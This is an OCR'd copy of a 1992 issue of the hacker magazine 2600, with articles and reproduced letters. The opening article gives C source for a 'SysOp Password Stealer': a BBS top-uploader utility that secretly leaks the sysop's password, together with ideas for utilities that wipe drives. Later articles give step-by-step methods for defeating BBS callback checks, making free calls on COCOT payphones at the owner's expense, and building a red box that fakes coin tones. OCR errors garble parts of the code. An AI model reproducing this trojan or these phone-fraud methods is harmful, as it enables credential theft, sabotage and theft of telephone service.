home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / 2600_9_3.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  143.8 KB  |  2,897 lines

  1.                                2600 Magazine
  2.                                Autumn, 1992
  3.  
  4.                                  OCR'd by:
  5.                    (Tsk, tsk.  You didn't really think I)
  6.                    (was gonna tell you that, did you?  &)
  7.                    (the next thing I know my phone, elec)
  8.                    (gas & cable are shut off, my Visa is)
  9.                    (maxed out, and the FBI says I killed)
  10.                    (JFK & MLK.  I think NOT!!!!!!!!!!!!!)
  11.  
  12.       (Anyway, you should buy, or better yet, subscribe to this GREAT)
  13.       (magazine, these guys need & deserve our support.  I have taken)
  14.       (great care to make sure that ALL addresses, etc. are accurate.)
  15.       (Still, considering just what it is they do, this is just a bit)
  16.       (ironic, isn't it??????????????????????????????????????????????)
  17.  
  18.  
  19.  
  20.                                      STAFF
  21.  
  22.                    Editor-In-Chief            Emmanuel Goldstein
  23.                    Office Manager             Tampruf
  24.                    Artwork                    Holly Kaufman Spruch
  25.  
  26.     "The back door program included a feature that was designed to modify a
  27.     computer in which the program was inserted so that the computer would be
  28.     destroyed if someone accessed it using a certain password."
  29.          United States Department of Justice, July 1992
  30.  
  31. Writers: Billsf, Eric Corley, Count Zero, The Devils Advocate,
  32. John Drake, Paul Estev, Mr. French, Bob Hardy, The Infidel,
  33. Knight Lightning, Kevin Mitnick, The Plague, Marshall Plann,
  34. David Ruderman, Bernie S., Silent Switchman, Scott Skinner,
  35. Mr. Upsetter, Dr. Williams, and the transparent adventurers.
  36. Technical Expertise: Rop Gonggnjp, Phiber Optik, Geo. C. Tilyou.
  37. Shout Outs: 8088, NSA, Mac, Franklin, Jutta, Eva, the Bellcore Support Group.
  38.  
  39.  
  40. 2600 (ISSN 0749-3851) is published quarterly by 2600 Enterprises Inc.,
  41. 7 Strong's Lane, Setauket, NY 11733. Second class postage permit paid at
  42. Setauket, New York.
  43. POSTMASTER: Send address changes to
  44.           2600, P.O. Box 752, Middle Island, NY 11953-0752.
  45. Copyright (c) 1992 2600 Enterprises, Inc.
  46. Yearly subscription: U.S. and Canada: $21 individual, $50 corporate (U.S. funds).
  47. Overseas -- $30 individual, $65 corporate.
  48. Back issues available for 1984, 1985, 1986, 1987, 1988, 1989, 1990, 1991
  49. at $25 per year, $30 per year overseas. Individual issues available
  50. from 1988 on at $6.25 each, $7.50 each overseas.
  51.  
  52. ****************************************************************************
  53. *                                                                          *
  54. *    ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO:                           *
  55. *    2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752.  *
  56. *    FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO:                        *
  57. *    2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099.      *
  58. *    INTERNET ADDRESS: 2600@well.sf.ca.us                                  *
  59. *                                                                          *
  60. ****************************************************************************
  61.  
  62.      2600 Office Line: 516-751-2600, 2600 FAX Line: 516-751-2608
  63.  
  64.  
  65.  
  66.  
  67.                                   Hacking
  68.                               by Swinging Man
  69.   The recent article on security holes in WWIV BBS's got me to thinking. Where
  70. WWIV is the board of choice among clone sysops, AmiExpress is the dominant
  71. software in the Amiga community, the pirate community anyway.
  72.  
  73.   AmiExpress is a relatively simple piece of software, and that's good because
  74. it keeps things quick and easy. No means are provided for the sysop to keep
  75. track of top uploaders or even last callers. What is provided is a batch file
  76. that is executed each time a user logs off. In the batch file, one runs
  77. utilities to compile data into text files that are stored as bulletins. That
  78. way the next user sees a bulletin containing the last few users that called,
  79. etc. It's a hassle, but it works.
  80.  
  81.   When I ran my own board, I wrote my own utilities to fill in these functions.
  82. Then put them in an archive and sent them out into the ether. It's good
  83. advertising. Most sysops don't write their own (surprise!); they have enough
  84. trouble getting utilities written by other people to run. This means it's
  85. really easy to take advantage of them.
  86.  
  87.   Most utilities search through four files: BBS:USER.DATA, which holds all the
  88. records of users; BBS:NODEx/CallersLog (where x is the node number and is
  89. usually 0), which records all the important stuff a user does when he's online;
  90. BBS:UDLog, which is like CallersLog, but only records transfers; and
  91. BBS:conference/Dirx, which are the vanilla ASCII files containing the names and
  92. descriptions of all the "warez."
  93.  
  94.   USER.DATA is the most interesting. If one were to write a top uploader
  95. utility, as I have done in the past, one would need to open this file to sort
  96. all the users by bytes uploaded. While you've got the file open, why not save
  97. the sysop's password for later? That's what I've done in the example program
  98. called "Steal.C ." It prints the best uploader with a seemingly random border
  99. around his name. Here's what the output looks like:
  100.  
  101.             UtwFqNyXoVAKBfsegnxRvDbPrmcdWl
  102.             ##           PRESTO         ##
  103.             UpwFqayXosAKBssegwxRvobPrrcdWd
  104.  
  105.   It looks random, but the difference between the top line and the bottom
  106. spells out "passwor&" Easy to see ff you're Iooldng for it, but if you're not
  107. paying attention it just looks like garbage. Of course, you could think up a
  108. better method of encrypting the password than just replacing every fourth
  109. letter. 
  110.  
  111.   This one is neat because you can just log on and see the sysop's password,
  112. but it's not the only way to do it. You could do anything to any user; however,
  113. the more specific the program becomes, the less useful it will become. It's not
  114. easy to get a sysop to change top uploader utilities. It would have to be better
  115. than the one he has, or maybe a fake update.
  116.  
  117.   I can think of endless fun to have with these utilities. How about a bit of
  118. conditional code that formats all drives when a certain user logs on, such as
  119. "Kill Board." Or maybe you just want to copy USER.DATA to a download path,
  120. renamed as "coolware.dms".
  121.  
  122.   So what can you do if you're an AmiExpress sysop? Don't use utilities written
  123. by anyone other than yourself. There isn't any other way. You can monitor the
  124. files opened when a utility is run, but an event-driven action won't be
  125. detected. Or you could look at the whole file and look for any text The text
  126. strings passed to DOS are usually intact. Of course a crunching program like
  127. IMPLODER will get rid of this. And an IMPLODED file can be encrypted with a
  128. password, so good luck finding something that way. Then again, you could
  129. always just forget it. It's only a BBS... you've got nothing to hide.  Right?
  130.  
  131.   This idea isn't just about AmiExpress.  How many BBS's have doors, or online
  132. games? How hard would it be to write a game like TradeWars that has an extra
  133. option that does any of the nasty things you've always wanted to do?
  134.  
  135.  
  136.       ------------------------------------------------------------------
  137.  
  138.  
  139. /**************************************************************************/
  140. /** SysOp Password Stealer vl.0 by Swinging Man                          **/
  141. /** Prints top uploader.....but also reveals SysOp's password            **/
  142. /** in the boarder                                                       **/
  143. /**************************************************************************/
  144. #include <stdio.h>
  145. #include <ctype.h>
  146. #include <time.h>
  147.  
  148. struct userdata { /* 232 bytes */
  149.  
  150. /* Since I hacked this out, there are still many */
  151. /* unknown areas of the record             */
  152.  
  153. char name[31];                       /*user's name*/
  154. char pass[9];                        /*user's password*/
  155. char from[30];                       /*user's FROM field*/
  156. char lone[13];                       /*phone number field*/
  157. unsigned short number;               /*user number*/
  158. unsigned short level;                /* level*/
  159. unsigned short type;                 /*type of ratio*/
  160. unsigned short ratio;                /*ratio of DLs to one UL*/
  161. unsigned short computer;             /*computer type*/
  162. unsigned short posts;                /*number of posts*/
  163. char unknownO[40];
  164. char basel10];                       /*conference access*/
  165. unsigned int unknown_numO;
  166. unsigned int unknown_numl;
  167. unsigned int unknown_num2;
  168. unsigned int used;                   /*seconds used today*/
  169. unsigned int timel;                  /*time per day*/
  170. unsigned int time2;                  /*clone of above*/
  171. unsigned int bytesdn;                /*bytes downloaded*/
  172. unsigned int bytesup;                /*bytes uploaded*/
  173. unsigned int bytelimit;              /*bytes avail per day*/
  174. unsigned int unknown_num3;
  175. char unknown1 [46];
  176. };
  177.    FILE *fp;
  178. struct list {
  179.    char name[40];
  180.    unsigned int bytes_uploaded;
  181.    struct list *next;
  182.    };
  183.  
  184. char rnd() {
  185.    char c;
  186.    c = (char)rand();
  187.    while(!(isalpha(c)) || (c<20)) c = (char)rand();
  188.  return (c);
  189.  }
  190.  
  191. main() {
  192.  
  193. int x,y;
  194.  
  195. struct userdata user;
  196. struct list head;
  197. struct list *temp, *temp2;
  198.  
  199. char password[9];
  200.  
  201. char border[31 ];
  202. char middle[31 ] = "##                          ##";
  203.  
  204. head.next = NULL;
  205.  
  206. if((fp = fopen("bbs:user.data","r")) == NULL) {
  207.     printf("Can't Open User File\n");
  208.     return 1;
  209.     }
  210.  
  211. /*get all users and put in list*/
  212. while(fread((void *)&user, sizeof(struct userdata), 1, fp) == 1){
  213.     if(user.number == 1) strcpy(password, user.pass);
  214.     if((user.level<200) &&(user.level>O)
  215.       && (user.bytesdn > 0)) {
  216.       ternp = (struct list *)malloc(sizeof(struct list));
  217.       if(temp == NULL) {
  218.         printf("Out of Memory!\n");
  219.         exit(1);
  220.       }
  221.       strcpy(temp->name, user.name);
  222.       temp->bytes_uploaded = user.bytesup;
  223.       temp2 = &head;
  224.       while((temp2->next != NULL)
  225.            && ((temp2->next->bytes_uploaded)
  226.                    > (temp->bytes_uploaded))) {
  227.         temp2 = temp2->next;
  228.       }
  229.       temp->next = temp2->next;
  230.       temp2->next = temp;
  231.     }
  232.   }
  233. fclose(fp);
  234. temp = head.next;
  235. srand((unsigned int)time(NULL));
  236. y = O;
  237. for(x=O;x<30;x++) border[x] = rnd();
  238. border[30] = '\0';
  239. printf("%s\n" ,border);
  240. strncpy(&middle[15-(strlen(temp->name)/2)],temp->name,strlen(temp->name));
  241. printf ("%s\n" .middle);
  242. for(x=1 ;x<30;x+=4) border[x] = password[y++];
  243. printf("%s\n" ,border);
  244. }
  245.  
  246.  
  247.       ------------------------------------------------------------------
  248.  
  249.  
  250.                  THE ALLIANCE AGAINST FRAUD IN TELEMARKETING
  251.                           NATIONAL CONSUMERS LEAGUE
  252.  
  253. THE TOP TEN SCAMS OF 1991
  254.  
  255. 1. POSTCARD GUARANTEED PRIZE OFFERS
  256.      You Are A DEFINITE Winner
  257.  
  258. 2. ADVANCE FEE LOANS
  259.      A Small Fee' For Processing The Application
  260.  
  261. 3. FRAUDULENT 900 NUMBER PROMOTIONS
  262.      Dial 900 To Claim Your Gift
  263.  
  264. 4. PRECIOUS METAL INVESTMENT SCHEMES
  265.      Gold Bullion: A 700% Profit Guaranteed Within Six Months
  266.  
  267. 5. TOLL CALL FRAUD
  268.      For Ten Bucksc Call Anywhere In The World
  269.  
  270. 6. HEADLINE GRABBERS
  271.      Thousands of Jobs Available: Help Rebuild Kuwait
  272.  
  273. 7. DIRECT DEBIT FROM CHECKING ACCOUNTS
  274.       Give Us Your Checking Account Number: We'll Handle The Rest
  275.  
  276. 8. PHONY YELLOW PAGES INVOICES
  277.       Send Us Your Check Today, To Make Sure Your Firm Is Listed
  278.  
  279. 9. PHONY CREDIT CARD PROMOTIONS
  280.       Bad Credit? No Credit? No Problem
  281.  
  282. 10. COLLECTORS ITEMS
  283.       Fabulous Coins At A Fraction Of The Dealer Price
  284.  
  285. THE ALLIANCE AGAINST FRAUD IN TELEMARKETING
  286. C/O THE NATIONAL CONSUMERS LEAGUE
  287. 815 FIFTEENTH STREET N.W., SUITE 928-N
  288. WASHINGTON, DC 20005
  289. 202-639-8140
  290.  
  291.  
  292.  
  293.       ------------------------------------------------------------------
  294.  
  295.  
  296.       --
  297.      ----
  298.   ----------    AT&T
  299.      ----
  300.       --
  301.  
  302.   Dear #########  {Minor Threat},
  303.  
  304.   AT&T has reason to believe that the telephone listed to you has been used in
  305. violation of Federal Comunnications Commission - AT&T Tariff F.C.C. No. 2
  306. Sections 2.2.3 and 2.2.4.C. These tariff sections prohibit using WATS to harass
  307. another, using WATS to interfere with the use of service by others and using
  308. WATS with the intent of gaining access to a WATS Customer's outbound calling
  309. capabilities on an unauthorized basis.
  310.  
  311. Accordingly, AT&T has temporarily restricted your telephones service's ability
  312. to place AT&T calls in accordance with section 2.8.2 of the above tariff. If
  313. the abusive calling occurs after AT&T lifts the temporary restrictions, the
  314. restriction will be reimposed until AT&T is satisfied that you have undertaken
  315. steps to secure your number againsl future tariff violations.
  316.  
  317. You should also note that unauthorized possession or use of access codes can
  318. constitute a violation of United States Criminal Code - Title 18, Section 1029,
  319. which carries a penalty of up to a $10,000 fine and up to 10 years imprisonment
  320. for first thne offenders. Any future activity from telephones listed to you may
  321. be referred to federal law enforcement officials.
  322.  
  323. If you wish to discuss this restrictions you may do so in writing to AT&T
  324. Corporate Security, CN 4901, Warren, NJ 07059-4901.
  325.  
  326.  {According to Minor Threat, this letter was received about a week after he
  327.   had scanned about 50 800 numbers in the 222 prefix sequentially by hand.}
  328.  
  329.  
  330.  
  331.       ------------------------------------------------------------------
  332.  
  333.  
  334.                         Defeating Callback Verification
  335.                                by Dr. Delam
  336.     So you feel you've finally met your match. While applying at this board
  337. that you've applied at before, you use a fake name, address, and phone
  338. number. Then comes the part you hate most: the callback verification. "How in
  339. hell am I going to get access without giving out my real number?! I guess i'll
  340. just have to 'engineer' the sysop." Only this particular sysop is too good.
  341. He tries a voice verification, and finds either a bad number or someone who
  342. doesn't even know what a BBS is. Now you have to reapply again! If you worked
  343. for the phone company or knew how to hack it, maybe you could set yourself up
  344. with a temporary number, but unfortunately you don't. So you think hard and
  345. come up with an idea: "All need is a local direct dial VMB. Then I can just
  346. have the sysop call that and make him think it's my home VMB system... that
  347. is, if I can find one to hack."
  348.  
  349.     Naw, still too hard. There must be an easier way. Loop? No, who wants to
  350. wait forever on a loop - every so often talking with Fred the pissed-off
  351. lineman. What else, what else? You can remember the things you used to do as
  352. a kid before you even knew what phreaking or hacking was. How about the time
  353. you called your friend Chris and at some point in the conversation, when
  354. things got boring, Chris said "I'm gonna call Mike now. Bye!" But you didn't
  355. want to hang up. You heard click, click... but no dialtone. You say "Hello?"
  356. and suddenly you hear Chris shout "Hang up the phone!" Haha! You had
  357. discovered a new trick! If you originated the call, you had ultimate
  358. control! That means if I call a BBS and it hangs up first, I actually am
  359. still connected to the line for a brief period (usually a maximum of 15
  360. seconds); and if the BBS picks up again to dial me for callback verification,
  361. it will get me for sure, regardless of the number it has!"
  362.  
  363.     This leaves just two problems to solve.  The first problem occurs when
  364. your modem senses a drop in DTR or loss in carrier from the BBS's modem, it
  365. will go on-hook. This means you will have to catch the phone before your modem
  366. hangs up. Your modem may have a setting that will ignore these changes. If
  367. not, you can build a busy switch. This may be done by placing a 1K ohm
  368. resistor and an SPST switch between the ring and tip (red and green) wires of
  369. your phone line. Completing this circuit at any time while online has
  370. the effect of a permanent off hook condition. The resistance provided is
  371. equivalent to the resistance present when your phone is off hook, thus
  372. creating a condition the C.O. recognizes as off hook. With good soldering and
  373. a good switch, no interference will be present after the switch is thrown
  374. while connected.
  375.     Note: Sysops may find the busy switch useful as a confirmation that the
  376. phone line is "busied out" when the BBS is taken down. Sometimes during down
  377. times a reboot or power down is necessary, which will cancel any busying
  378. effects the modem had set previously, making a busy switch in this case
  379. ideal. The second problem occurs when the BBS's modem expects a dialtone
  380. after going from on hook to off hook. A dialtone will have to be provided for
  381. the BBS's modem before it will try dialing whatever phone number you
  382. provided. This requires what I call a "CAVERN box" (CAllback VERificatioN).
  383. Like many other boxes, it is a simple generation of tones. For a cheap and
  384. inexpensive method, use a tape recorder to record and play back the dialtone.
  385. Computer sound generation hasn't been tested, but most PC speakers generate a
  386. square wave, while dialtones are sinusoidal. The best chance for accurate,
  387. artificial sound generation is with a synthesizer. The two frequencies of a
  388. dialtone are 300hz and 420hz. Many  musicians  recognize 440.00hz as the note
  389. A4, and the frequency from which scales are built. Just below A4 on an equal
  390. tempered chromatic scale is at 415.30hz. Tuning a synthesizer just shy of a
  391. positive quarter tone from the normal scale will yield a G#4 at 420hz and
  392. bring the D4 of 293.66hz within an acceptable range of 300hz.
  393.  
  394.     Needless to say, once you have prevented your modem from hanging up and
  395. have generated a dialtone which has effectively caused the BBS's modem to
  396. dial the phone number, you should issue an answer tone by typing the Hayes
  397. "ATA" command. You will then be connected with the BBS's modem and will have
  398. protected your identification.
  399.  
  400.     Thanks to Green Hell for some help in generating concepts presented.
  401.  
  402.  
  403.  
  404.       ------------------------------------------------------------------
  405.  
  406.                               WRITE FOR 2600!
  407.                            SEND YOUR ARTICLES TO:
  408.                           2600 ARTICLE SUBMISSIONS
  409.                                 P.O. BOX 99
  410.                           MIDDLE ISLAND, NY 11953
  411.                         INTERNET: 2600@well.sf.ca.us
  412.                        Remember, all writers get free
  413.                         subscriptions as well as free
  414.                       accounts on our voice mail system.
  415.                      To contact a 2600 writer, call 0700-
  416.                      751-2600.  If you're not using AT&T,
  417.                       preface that with 10288.  Use touch
  418.                         tones to track down the writer
  419.                      you're looking for.  Overseas callers
  420.                        can call our office (516) 751-2600
  421.                          and we'll forward the message.
  422.  
  423.  
  424.       ------------------------------------------------------------------
  425.  
  426.  
  427.                             ADJUSTMENT LETTER
  428.                         CALLING CARD FRAUD CLAIMS
  429.  
  430. Date_______
  431. Customer Name
  432. City, State
  433. Re: (Account Number)
  434.  
  435.  
  436. Dear ___________________,
  437.  
  438.   Your AT&T Calling Card is a valuable service to help meet
  439. your long distance needs.  AT&T is concerned with quickly
  440. resolving any unauthorized charges associated with your AT&T
  441. Calling card.  In response to your request, we have removed the
  442. disputed charges from your account. This credit is made pending
  443. an investigation of your claim by AT&T.
  444.  
  445. To facilitate the investigation of your claim, please complete
  446. the bottom portion of this letter.  Read the information,
  447. describe the facts surrounding your claim, include any relavent
  448. documentation that you may have, sign and return it to us in the
  449. enclosed postage-paig envlope.
  450.  
  451. (Please complete this portion and return to AT&T Security.)
  452.  
  453. AT&T Corporate Security
  454. P.O.  Box 1927
  455. Roswell, Georgia 30077-1927
  456.  
  457. On my ___/___/___    Billing statement(s), long distance charges for
  458. calls in the amount of $_______  were billed to my telephone
  459. number__________________.  These calls were not made or authorized by
  460. me.     I have received an adjustment for these calls and
  461. understand that this adjustment is made pending an investigation
  462. of my claim by AT&T Security.
  463.  
  464. (Please describe the facts which lead you to believe these
  465. are unauthorized.   You may attach additional sheets if needed.)
  466.  
  467. I will cooperate with AT&T Security in investigating my claim.
  468.                  Signed______________________________
  469.                  Print Name__________________________
  470.                  Social Security Number______________
  471.                  Account Number______________________
  472.  
  473.   If you have any questions, please call AT&T Security at
  474. 800 346-4073 or 800 346-4074.
  475.  
  476. Sincerely,
  477.  
  478. Account Representative
  479.  
  480.          ****WHAT A GREAT SCAM TO GET SOCIAL SECURITY NUMBERS.****
  481.  
  482.  
  483.  
  484.       ------------------------------------------------------------------
  485.  
  486.  
  487.  
  488. PHONE MANAGEMENT ENTERPRISES
  489. 396 WASHINGTON AVENUE
  490. CARLSTADT, NEW JERSEY 07072
  491. (201) 507-1951
  492. FAX (201) 507-1095
  493.  
  494. THIS LETTER IS REGARDING YOUR RECENT REQUEST FOR A REFUND ON THE
  495. PAY TELEPHONE YOU USED.   WE APOLOGIZE FOR ANY INCONVENIENCE THIS
  496. MAY HAVE CAUSED YOU AND WE ASSURE YOU,  THE PROBLEM HAS BEEN
  497. CORRECTED.
  498.  
  499. WE ARE ENCLOSING, IN LIEU OF A CASH REFUND , UNITED STATES POSTAL
  500. STAMPS TO COVER YOUR LOSS, THIS BEING A SAFER WAY FOR YOU TO BE
  501. ASSURED OF YOUR REFUND.
  502.  
  503. SHOULD YOU HAVE ANY QUESTIONS, PLEASE CALL US AT (201) 507-1951.
  504.  
  505. SINCERELY,
  506.  
  507. PHONE MANAGEMENT ENTERPRISES, INC.
  508.  
  509. This is what happens when you request a refund from this company. In this
  510. case, correspondent Winston Smith received two 25 cent stamps which
  511. means he now has to get two four-cent stamps if he wants to mail anything.
  512. Note also that this letter is actually a xerox of a fax that originated
  513. with Tri State Radio Co. The wondrous mysteries of a COCOT  ....
  514.  
  515.  
  516.  
  517.       ------------------------------------------------------------------
  518.  
  519.  
  520.                         SHOPPER'S GUIDE TO COCOTS
  521.                              by Count Zerg
  522.                        Restricted Data Transmission
  523.                  'Truth is Cheep, but information costs'
  524.  
  525.     So you're walking down the street and you see a payphone. Gotta make an
  526. important call, so you dig into your pocket to get a dime. Picking up the
  527. handset, you suddenly notice that the payphone wants a quarter for a local
  528. call! What the hell, and where did this synthesized voice come from?
  529.  
  530.     Let's make this article short and to the point. COCOT is an acronym for
  531. Customer Owned Coin Operated Telephone. In other words, a COCOT is a phone
  532. owned or rented by a paying customer (most likely, a hotel or donut shop). A
  533. COCOT is not a normal payphone. The telco doesn't own it, and the actual phone
  534. line is usually a normal customer loop (unlike payphones, where the phone line
  535. is a 'special" payphone loop, allowing the use of "coin tones" to indicate
  536. money dropped in). So a COCOT may look and smell like a telco payphone, but it
  537. is not.
  538.  
  539.     Why do COCOTs exist? Simple. Money? A customer owned payphone is money in
  540. the bank. You pay more for local calls and long distance is typically handled
  541. by sleazy carriers that offer bad/expensive service. The owner/renter of the
  542. COCOT opens the coinbox and keeps the money him/herself! Also, a particularly
  543. sleazy quality of a COCOT is the fact that it does not receive incoming calls.
  544. This, of course, is because of money. If people are calling in to a COCOT, the
  545. COCOT is not making money and businesses always want to make as much money as
  546. possible even if it hurts the consumer. Think about it. It really sucks to
  547. call someone at home from a COCOT and then not be able to have him/her call
  548. you back to save money. "Guess I'II have to keep feeding the COCOT quarters!"
  549.  
  550.     Where is a good place to look for COCOTs? Outside Dunkin Donut shops,
  551. restaurants, clubs, bars, and outside/inside hotels and 'convenient" locations.
  552.  
  553.     How do l figure out if I have found a COCOT? Simple. A COCOT will have no
  554. telco logos on it. It may look just like a telco phone chrome with blue
  555. stickers and all that. Also, a COCOT typically charges more for a local call
  556. than a regular telco payphone.  (In Massachusetts, local calls are a dime. In
  557. places like New York City, they are 25 cents.) A COCOT will most often have a
  558. synthesized voice that asks you to "please deposit 25 cents" or whatever.
  559. Also, some fancy COCOTS will not look like payphones at all. Some in hotels
  560. have weird LCD displays and look totally different but they always charge you
  561. more than a normal payphone.
  562.  
  563.     I found this weird payphone in Boston that wants  a quarter,  and this
  564. synthesized voice is harassing me. When does the phun begin? Soon. First of
  565. all, you must understand that the COCOT is a mimic. Essentially, it wants you
  566. to think that it is just a plain ol' payphone. Pick up the handset. Hear that
  567. dialtone? Hah? That dialtone is fake. synthesized by the innards of the COCOT.
  568. You are at the mercy of the COCOT. Remember, a COCOT runs off of a normal
  569. customer loop so, unlike a telco payphone where you must deposit money to
  570. generate coin tones that are read by the central office, the security of a
  571. COCOT depends solely on the COCOT phone itself. It's as if you took your own
  572. phone and put a sign on it saying "Please put 10 cents in this jar for every
  573. call you make." COCOTS are not naive. They won't let you near the unrestricted
  574. dialtone until you fork over the cash-ola. Or so they think!
  575.  
  576.     See, the Achilles heel of the COCOT is the fact that all payphones must let
  577. you make 1-800 calls for free! It's not just a fact, it's the law. Now pick up
  578. the handset again and place a 1-800 call. Any 1-800 number will do. When they
  579. answer at the other end, just sit there. Do nothing. Ignore them. Wait for
  580. them to hang up the phone. Here's an example.
  581.  
  582.     Dial 1-800-LOAN-YES.
  583.     [Ring, Ring] ... [click] "Hello, you wanna buy some money?
  584.     Hello? HELLO?!" [CLICK]
  585.     (You will now hear some static and probably a strange "waffling" noise,
  586.     like chh, chh, chh, chh, chh)
  587.     [CLICK] DIALTONEl
  588.  
  589.     Now what have we got here? A dialtone? Yes, you guessed it, the
  590. dialtone you now hear is the unrestricted dialtone of the COCOT's customer loop.
  591.  
  592.     So what? So I got an "unrestricted dialtone". Big deal?
  593.  
  594.     Meathead! With an unrestricted dialtone, all you need to do is place a call
  595. via DTMF tones (the tones a touch-tone keypad generates). Now, try dialing a
  596. number with the COCOT's keypad. Whoal Waitasec, no sound! This is a typical
  597. lame attempt at protection by the COCOT. Just whip out your Radio Shack pocket
  598. tone dialer and try calling a number, any number. Place it just as if you were
  599. calling from a home phone. Call a 1-900 sex line. Call Guam. You are free and
  600. the COCOT's customer loop is being billed!
  601.  
  602.     Note: some COCOTS are more sophisticated at protecting themselves. Some
  603. will reset when they hear the dialtone. To get around this, make a loud
  604. hissing sound with your mouth into the mouthpiece after the 1-800 number hangs
  605. up. Get your tone dialer ready near the mouthpiece. When you hear the
  606. dialtone, quickly dial the first digit of the number you want to call. If you
  607. hiss loudly enough, you may be able to mask the sound of the dialtone and
  608. prevent the COCOT from resetting. Once you dial the first digit of the number
  609. you are calling, the dialtone will disappear (naturally). You can stop hissing
  610. like an idiot now. Finish dialing your free phone call. Also, some COCOTs
  611. actually disable the handset after a call hangs up (in other words, you can't
  612. send DTMF tones through the mouthpiece). Oh well, better luck next time.
  613.  
  614.     However most of the COCOTs I have run across only disable the DTMF
  615. keypad. So all you need is a pocket dialer to circumvent this!
  616.  
  617.     Other things to know: Sure, you can't call a COCOT, but it does have a
  618. number. To find out the COCOT's number, call one of the automated ANI services
  619. that tell you the number you're dialing from (the numbers keep changing but
  620. they are frequently printed in 2600). Now try calling the COCOT from another
  621. phone. You will hear one of two things: 1) synthesized voice: "Thank you"
  622. [DTMF tones] [CLICK] [hang up]; 2) weird carrier.
  623.  
  624.     A COCOT's number is only used by the company that built or sold the COCOT.
  625. By calling up a COCOT, a tech can monitor its functioning, etc. In case number
  626. 1, you must enter a 3 or 4 digit password and then you'II get into a voice
  627. menu driven program that'Il let you do "maintenance" stuff with the COCOT. In
  628. case number 2, you are hooked to the COCOT's 300 bps modem (Yes, a modem in a
  629. payphone). Likewise. if you can figure out the communications settings, you'll
  630. be into the COCOT's maintenance routines.
  631.  
  632.     Personally. l haven't had much luck (or patience) with calling up and
  633. hacking COCOT maintenance functions. l just like making free phone calls from
  634. them.
  635.  
  636.     COCOT Etiquette: Now, remember, you are making free phone calls but
  637. someone has to pay for them and that is the owner. The COCOT's customer loop
  638. is billed the cost of the calls, and if the owner sees a big difference in the
  639. profits made on the COCOT (profit equals coins from the COCOT minus the bill
  640. from the telco for customer loop), they'Il know something is up. So the rule
  641. is don't abuse them/Don't call a 1-900 number and stay on the line for 12
  642. hours! If a COCOT is abused severely, an owner will eventually lose money on
  643. the damn thing. And that means bye bye COCOT. Also, remember that a record of
  644. all long distance calls is made to the COCOT's customer loop and COCOT
  645. companies will sometimes investigate "billing discrepancies" so don't call
  646. anyone you personally know unless you are sure they are "cool".
  647.  
  648.     [RING RING] "Hello?"
  649.     "Hello, this is Cointel, Inc. We'd like to ask you a few questions about a
  650.     call you received from Boston on 2/12/91. Could you tell us the name and
  651.     address of the person who placed the call?"
  652.     Cool dude: "What? I don't remember. Go to hell! [SLAM]"
  653.     Meathead: "Uh, sure, his name is John Smith. You want his address too?"
  654.  
  655.     Get the picture? Good....
  656.  
  657.     COCOTs are a great resource if we use them wisely, like our environment.
  658. We've gotta be careful not to plunder them. Make a few long distance calls and
  659. then leave that particular COCOT alone for awhile. Chances are your bills will
  660. be "absorbed" by the profit margin of the owner and probably ignored but the
  661. smaller the owner's profit margin gets, the more likely suspicions will be
  662. aroused. 'nuff said! I have found COCOTs everywhere. COCOT technology is
  663. relatively new, though. I know many towns that have none. Check out big cities.
  664.  
  665.     As for a tone dialer, don't leave home without one! A true phreak always
  666. has a DTMF tone dialer at hand along with a red box! My personal favorite is
  667. the COMBO-BOX (red box plus DTMF). Take a Radio Shack 33-memory Pocket Dialer.
  668. Open up the back. Remove the little 3.579 MHz crystal (looks like a metal
  669. cylinder). Unsolder it. Solder on a couple of thin, insulated wires where the
  670. crystal was attached. Thread the wires through one of the "vents" in the back
  671. of the tone dialer. Get ahold of a 6.5536 MHz crystal (available thru Fry's
  672. Electronics, 89 cents apiece, phone number (415) 770-3763). Go out and get
  673. some quick drying epoxy and a Radio Shack mini Toggle Switch. DPDT, cat. #275-
  674. 626. Close the tone dialer, with the two wires sticking out one of the back
  675. vents. Screw it up tight. Now, attach the crystals and wires to the switch
  676. with solder as in the diagram below:
  677.  
  678.                                       |^^^^^|
  679.                                       |    xx  <3.579 crystal> small one
  680.                                       |    |
  681.              toggle switch ->       oooooooX     xxxxs <two wires>
  682.                                       |    |
  683.                                       |    xx   <6.5536 crystal> big one
  684.                                       |    |
  685.                                        ^^^^^
  686.  
  687.     Each "xx" prong in the diagram is actually two prongs. Hook up the two
  688. leads from the crystals to separate prongs (same with the wires).
  689.  
  690.     Now, epoxy this gizmo to the side of the tone dialer. Use a lot of epoxy,
  691. as you must make the switch/crystals essentially embedded in epoxy resin, as
  692. in the diagram below:
  693.  
  694. Front view ->      _________________________
  695.                    |                       |T <-toggle switch
  696.                    |     oo    oo    oo    |---
  697.                    |                       |  |
  698.                    |                       |---
  699.                    |     1     2     3     |Bs <-two crystals (B=big,s=small)
  700.                    |                       |  |    in epoxy "blob"
  701.                    |     4     5     6     |--
  702.                    |                       |
  703.                    |     7     8     9     | ^two wires running to back of unit
  704.                    |                       |
  705.                    |     *     0     #     |
  706.                    |                       |
  707.                    -------------------------
  708.  
  709.  
  710.                    _________________________
  711.  Back view ->      |                       |
  712.                  T | o         ----- o-----------------------vent (1 of 4)
  713.                 ---|         /        \    |
  714.                |   |        |       --------------------speaker
  715.                  ---|       |         |    |
  716.                   sB|       |         |    |
  717.   2 wires ->       \------o   ----    o    |
  718.   running into     |                       |
  719.   vent             |                       |
  720.                    |                       |
  721.                    |                       |
  722.                    |                       |
  723.                    -------------------------
  724.  
  725.  
  726.     Make sure the epoxy is really gobbed on there. You want to be certain the
  727. switch and crystals are firmly attached and secure in a matrix of epoxy (it
  728. doesn't concduct electricity, so don't worry about shorting out the
  729. connections to the toggle switch). Just don't gum up the action of the switch!
  730.  
  731.     Basically, you've altered the device so you can select between two crystals
  732. to generate the timing for the microprocessor in the tone dialer.
  733.  
  734.     Turn on the tone dialer. Now you can easily switch between the two crystal
  735. types. The small crystal will generate ordinary DTMF tones. By simply flicking
  736. the switch, you generate higher tones, using the memory function of the tone
  737. dialer, save five stars in the P1 location. Now dial the P1 location using the
  738. big crystal. Sure sounds like the tones for a quarter, dowsn't it?
  739.  
  740.     Carrying this around with you will always come in handy with both telco
  741. payphones and COCOTs! No phreak should be without one!
  742.  
